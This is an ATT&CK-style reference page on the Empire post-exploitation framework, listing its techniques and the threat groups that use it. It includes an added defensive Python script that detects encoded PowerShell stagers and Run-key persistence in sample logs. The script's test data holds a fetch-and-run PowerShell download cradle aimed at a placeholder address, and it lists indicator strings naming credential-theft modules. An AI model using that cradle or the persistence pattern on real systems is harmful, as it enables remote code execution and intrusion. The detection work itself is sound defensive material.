
Empire

Empire is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.[1][2][3]

ID: S0363
Associated Software: EmPyre, PowerShell Empire
Type: TOOL
Platforms: Linux, macOS, Windows
Version: 1.0

Associated Software Descriptions

Name Description
EmPyre [2]
PowerShell Empire [2]

Techniques Used

Domain ID Name Use
Enterprise T1134 Access Token Manipulation Empire can use Invoke-RunAs to create tokens, as well as PowerSploit's Invoke-TokenManipulation to manipulate access tokens. [2]
Enterprise T1015 Accessibility Features Empire can leverage WMI debugging to remotely replace binaries like sethc.exe, Utilman.exe, and Magnify.exe with cmd.exe. [2]
Enterprise T1087 Account Discovery Empire can acquire local and domain user account information. [2]
Enterprise T1217 Browser Bookmark Discovery Empire has the ability to gather browser data such as bookmarks and visited sites. [2]
Enterprise T1088 Bypass User Account Control Empire includes various modules to attempt to bypass UAC for escalation of privileges. [2]
Enterprise T1115 Clipboard Data Empire can harvest clipboard data on both Windows and macOS systems. [2]
Enterprise T1059 Command-Line Interface Empire uses a command-line interface to interact with systems. [2]
Enterprise T1043 Commonly Used Port Empire can conduct command and control over commonly used ports like 80 and 443. [2]
Enterprise T1136 Create Account Empire has a module for creating a new domain user or local user if permissions allow. [2]
Enterprise T1003 Credential Dumping Empire contains an implementation of Mimikatz to gather credentials from memory. [2]
Enterprise T1081 Credentials in Files Empire can use various modules to search for files containing passwords. [2]
Enterprise T1002 Data Compressed Empire can ZIP directories on the target system. [2]
Enterprise T1175 Distributed Component Object Model Empire can utilize Invoke-DCOM to leverage remote COM execution for lateral movement. [2]
Enterprise T1038 DLL Search Order Hijacking Empire contains modules that can discover and exploit various DLL hijacking opportunities. [2]
Enterprise T1482 Domain Trust Discovery Empire has modules for enumerating domain trusts. [2]
Enterprise T1114 Email Collection Empire has the ability to collect emails on a target system. [2]
Enterprise T1106 Execution through API Empire contains a variety of enumeration modules that have an option to use API calls to carry out tasks. [2]
Enterprise T1048 Exfiltration Over Alternative Protocol Empire can use Dropbox and GitHub for data exfiltration. [2]
Enterprise T1041 Exfiltration Over Command and Control Channel Empire can send data gathered from a target through the command and control channel. [2]
Enterprise T1068 Exploitation for Privilege Escalation Empire can exploit vulnerabilities such as MS16-032 and MS16-135. [2]
Enterprise T1210 Exploitation of Remote Services Empire has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers. [2]
Enterprise T1083 File and Directory Discovery Empire includes various modules for finding files of interest on hosts and network shares. [2]
Enterprise T1484 Group Policy Modification Empire can use New-GPOImmediateTask to modify a GPO that will install and execute a malicious Scheduled Task. [2]
Enterprise T1179 Hooking Empire contains some modules that leverage API hooking to carry out tasks, such as NetRipper. [2]
Enterprise T1056 Input Capture Empire includes keylogging capabilities for Windows, Linux, and macOS systems. [2]
Enterprise T1208 Kerberoasting Empire uses PowerSploit's Invoke-Kerberoast to request service tickets and return crackable ticket hashes. [2]
Enterprise T1171 LLMNR/NBT-NS Poisoning and Relay Empire can use Inveigh to conduct name service poisoning for credential theft and associated relay attacks. [2] [4]
Enterprise T1031 Modify Existing Service Empire can utilize built-in modules to modify service binaries and restore them to their original state. [2]
Enterprise T1046 Network Service Scanning Empire can perform port scans from an infected host. [2]
Enterprise T1135 Network Share Discovery Empire can find shared drives on the local system. [2]
Enterprise T1040 Network Sniffing Empire can be used to conduct packet captures on target hosts. [2]
Enterprise T1027 Obfuscated Files or Information Empire has the ability to obfuscate commands using Invoke-Obfuscation. [2]
Enterprise T1075 Pass the Hash Empire can perform pass the hash attacks. [2]
Enterprise T1097 Pass the Ticket Empire can leverage its implementation of Mimikatz to obtain and use Silver and Golden Tickets. [2]
Enterprise T1034 Path Interception Empire contains modules that can discover and exploit various path interception opportunities. [2]
Enterprise T1086 PowerShell Empire leverages PowerShell for the majority of its client-side agent tasks. Empire also contains the ability to conduct PowerShell remoting with the Invoke-PSRemoting module. [2] [1]
Enterprise T1145 Private Keys Empire can use modules like Invoke-SessionGopher to extract private key and session information. [2]
Enterprise T1057 Process Discovery Empire can find information about processes running on local and remote systems. [2]
Enterprise T1055 Process Injection Empire contains multiple modules for injecting into processes, such as Invoke-PSInject. [2]
Enterprise T1060 Registry Run Keys / Startup Folder Empire can modify the registry run keys HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run for persistence. [2]
Enterprise T1105 Remote File Copy Empire can upload and download to and from a victim machine. [2]
Enterprise T1021 Remote Services Empire contains modules for executing commands over SSH as well as in-memory VNC agent injection. [2]
Enterprise T1053 Scheduled Task Empire has modules to interact with the Windows task scheduler. [2]
Enterprise T1113 Screen Capture Empire is capable of capturing screenshots on Windows and macOS systems. [2]
Enterprise T1064 Scripting Empire has modules for executing scripts. [2]
Enterprise T1063 Security Software Discovery Empire can enumerate antivirus software on the target. [2]
Enterprise T1101 Security Support Provider Empire can enumerate Security Support Providers (SSPs) as well as utilize PowerSploit's Install-SSP and Invoke-Mimikatz to install malicious SSPs and log authentication events. [2]
Enterprise T1035 Service Execution Empire can use PsExec to execute a payload on a remote host. [2]
Enterprise T1023 Shortcut Modification Empire can persist by modifying a .LNK file to include a backdoor. [2]
Enterprise T1178 SID-History Injection Empire can add a SID-History to a user if run on a domain controller. [2]
Enterprise T1071 Standard Application Layer Protocol Empire can conduct command and control over protocols like HTTP and HTTPS. [2]
Enterprise T1032 Standard Cryptographic Protocol Empire can use TLS to encrypt its C2 channel. [2]
Enterprise T1082 System Information Discovery Empire can enumerate host system information like OS, architecture, applied patches, and more. [2]
Enterprise T1016 System Network Configuration Discovery Empire can acquire network configuration information like DNS servers and network proxies used by a host. [2]
Enterprise T1049 System Network Connections Discovery Empire can enumerate the current network connections of a host. [2]
Enterprise T1099 Timestomp Empire can timestomp any files or payloads placed on a target machine to help them blend in. [2]
Enterprise T1127 Trusted Developer Utilities Empire can use built-in modules to abuse trusted utilities like MSBuild.exe. [2]
Enterprise T1125 Video Capture Empire can capture webcam data on Windows and macOS systems. [2]
Enterprise T1102 Web Service Empire can use Dropbox and GitHub for C2. [2]
Enterprise T1047 Windows Management Instrumentation Empire can use WMI to deliver a payload to a remote host. [2]
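The table above names two things a defender can check for directly: Empire's agent is pure PowerShell, and it persists through the HKCU and HKLM Run keys. The following script is an added example written for this page; it is not Empire's code and not part of the ATT&CK entry. It applies both checks to constructed log events: it decodes PowerShell -EncodedCommand blobs found in process-creation command lines and flags download cradles or module names the entry attributes to Empire (Invoke-Mimikatz, Invoke-Kerberoast, Invoke-PSInject, Invoke-TokenManipulation, Invoke-DCOM), and it flags registry writes under the two Run keys the entry lists. The Sysmon-style field names (Event ID 1 CommandLine, Event ID 13 TargetObject/Details), the sample command lines and registry paths, and the premise that Empire stagers are typically delivered as an -EncodedCommand are all assumptions of this example, not statements from the page.

```python
"""Added example: triage constructed process-creation and registry events for
PowerShell -EncodedCommand stagers (T1086/T1027) and Run-key persistence
(T1060). Not Empire's code; field names and sample values are constructed."""
import base64
import binascii
import re

# Constructed stager-style script (192.0.2.10 is a documentation address).
# That Empire stagers arrive as -EncodedCommand is an assumption of this example.
_CONSTRUCTED_SCRIPT = (
    "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/index.asp')"
)
# PowerShell expects the encoded command to be base64 of UTF-16LE text.
_CONSTRUCTED_ENC = base64.b64encode(_CONSTRUCTED_SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed events in the shape of Sysmon Event ID 1 (process creation) and
# Event ID 13 (registry value set). These are not real telemetry.
SAMPLE_EVENTS = [
    (1, {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": f"powershell -NoP -NonI -W Hidden -Exec Bypass -Enc {_CONSTRUCTED_ENC}"}),
    (1, {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"}),
    (13, {"TargetObject": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
          "Details": f"powershell -w hidden -enc {_CONSTRUCTED_ENC}"}),
    (13, {"TargetObject": r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Common Startup",
          "Details": r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"}),
]

# Substrings worth flagging in a decoded script: generic download cradles plus
# module names the ATT&CK entry attributes to Empire. Matched case-insensitively.
SCRIPT_INDICATORS = (
    "iex", "invoke-expression", "downloadstring", "net.webclient", "frombase64string",
    "invoke-mimikatz", "invoke-kerberoast", "invoke-psinject",
    "invoke-tokenmanipulation", "invoke-dcom", "invoke-obfuscation",
)

# The two Run keys named on the page, accepting the hive spellings seen in logs
# (HKCU/HKLM abbreviations and the HKU\<SID> form Sysmon uses for HKCU).
RUN_KEY_RE = re.compile(
    r"^(?:HKEY_CURRENT_USER|HKCU|HKEY_LOCAL_MACHINE|HKLM|HKU\\[^\\]+)"
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\",
    re.IGNORECASE,
)


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand.
    powershell.exe accepts -e, -ec and any prefix of -EncodedCommand (-en,
    -enc, -encoded, ...); -Exec / -ExecutionPolicy are not prefixes of it.
    Returns None when there is no encoded command or it does not decode."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        flag = tok.lstrip("-/").lower()
        if flag in ("e", "ec") or (flag and "encodedcommand".startswith(flag)):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError):
                return None
    return None


def script_indicators(script):
    """List the indicator substrings present in a decoded script."""
    low = script.lower()
    return [ind for ind in SCRIPT_INDICATORS if ind in low]


def is_run_key_write(target_object):
    """True if the registry path is a value under HKCU\\...\\Run or HKLM\\...\\Run."""
    return bool(RUN_KEY_RE.match(target_object))


def triage(events):
    """Apply both checks to (event_id, fields) tuples and return findings."""
    findings = []
    for event_id, fields in events:
        if event_id == 1:
            script = decode_encoded_command(fields.get("CommandLine", ""))
            if script is not None:
                findings.append({"technique": "T1086", "decoded": script,
                                 "indicators": script_indicators(script)})
        elif event_id == 13:
            target = fields.get("TargetObject", "")
            if is_run_key_write(target):
                # The Run value itself may carry an encoded stager; decode it too.
                script = decode_encoded_command(fields.get("Details", ""))
                findings.append({"technique": "T1060", "key": target, "decoded": script,
                                 "indicators": script_indicators(script) if script else []})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed events, the script reports the hidden-window encoded launch and the HKCU Run value (both decoding to the download cradle) and stays silent on the benign -File invocation and the Explorer Shell Folders write. In production the same two functions would be fed from Sysmon or 4688/4657 events rather than the inline samples; RunOnce and the per-user Startup folder the page does not mention are deliberately left out of the regex.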

Groups That Use This Software

ID Name References
G0052 CopyKittens [5]
G0051 FIN10 [6]
G0073 APT19 [1]
G0064 APT33 [7] [8]
G0010 Turla [9]
G0090 WIRTE [10]

References